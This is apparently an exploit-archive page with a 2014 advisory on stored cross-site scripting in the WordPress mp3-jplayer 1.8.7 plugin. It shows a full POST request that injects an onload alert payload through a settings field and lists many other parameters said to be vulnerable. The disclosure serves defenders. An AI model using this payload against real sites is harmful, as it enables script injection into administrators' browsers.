what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress mp3-jplayer 1.8.7 Cross Site Scripting

WordPress mp3-jplayer 1.8.7 Cross Site Scripting
Posted Feb 26, 2014
Authored by HauntIT

WordPress mp3-jplayer plugin version 1.8.7 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 91b07fd21c45f1692daef0821fa7179eaedefe8e444588acf5a7ee01b5f84792

WordPress mp3-jplayer 1.8.7 Cross Site Scripting

Change Mirror Download
# ==============================================================
# Title ...| Multiple XSS in mp3-jplayer
# Version .| mp3-jplayer.1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# Multiple XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=mp3jplayer.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1441

mp3foxVol=100&make_player_from_link=true&mp3foxOnBlog=true&mp3foxTheme=styleF&mp3foxCustomStylesheet='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&mp3foxScreenOpac=&mp3foxScreenColour=&mp3foxLoadbarOpac=&mp3foxLoadbarColour=&mp3foxPosbarOpac=&mp3foxPosbarColour=&mp3foxPosbarTint=&mp3foxPlaylistOpac=&mp3foxPlaylistColour=&mp3foxPlaylistTint=&mp3foxIndicator=&mp3foxVolGrad=&mp3foxListDivider=&mp3foxScreenTextColour=&mp3foxListTextColour=&mp3foxListCurrentColour=&mp3foxListBGaCurrent=&mp3foxListHoverColour=&mp3foxListBGaHover=&mp3foxPopoutBackground=&mp3foxPopoutBGimage=&librarySortcol=file&libraryDirection=ASC&mp3foxfolder=%2F&mp3foxPlayerWidth=40%25&mp3foxFloat=none&mp3foxDownloadMp3=false&loggedout_dload_text=LOG+IN+TO+DOWNLOAD&loggedout_dload_link=http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-login.php&dload_text=DOWNLOAD+MP3&force_browser_dload=true&dloader_remote_path=&mp3foxPaddings_top=5px&mp3foxPaddings_inner=35px&mp3foxPaddings_bottom=40px&mp3foxMaxListHeight=450&mp3foxShowPlaylist=true&file_separator=%2C&caption_separator=%3B&mp3foxEnablePopout=true&mp3foxPopoutWidth=400&mp3foxPopoutMaxHeight=600&mp3foxPopoutButtonText=&mp3foxEncodeFiles=true&mp3foxAllowRemote=true&make_player_from_link_shcode=%5Bmp3j+track%3D%22%7BTEXT%7D%40%7BURL%7D%22+volslider%3D%22y%22+style%3D%22outline%22%5D&touch_punch_js=true&disableJSlibs=&update_mp3foxSettings=Update+Settings&mp3foxRemember=true&MtogBox1=false&mp3foxPluginVersion=1.8.7
---<request>---

Also vulnerable:
mp3foxScreenOpac, mp3foxScreenColour, mp3foxLoadbarOpac, mp3foxLoadbarColour, mp3foxPosbarOpac, mp3foxPosbarColour,
mp3foxPlaylistOpac, mp3foxPlaylistColour, mp3foxScreenTextColour, mp3foxListTextColour, mp3foxListCurrentColour, mp3foxListBGaCurrent, mp3foxListBGaCurrent, mp3foxListHoverColour, mp3foxListBGaHover, mp3foxPopoutBackground,
mp3foxPopoutBGimage, mp3foxPlayerWidth, mp3foxPlayerWidth, loggedout_dload_text, loggedout_dload_link, dload_text,
dloader_remote_path, mp3foxPaddings_top, mp3foxPaddings_inner, mp3foxPaddings_bottom, file_separator, caption_separator, mp3foxPopoutButtonText, make_player_from_link_shcode, MtogBox1

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    11 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close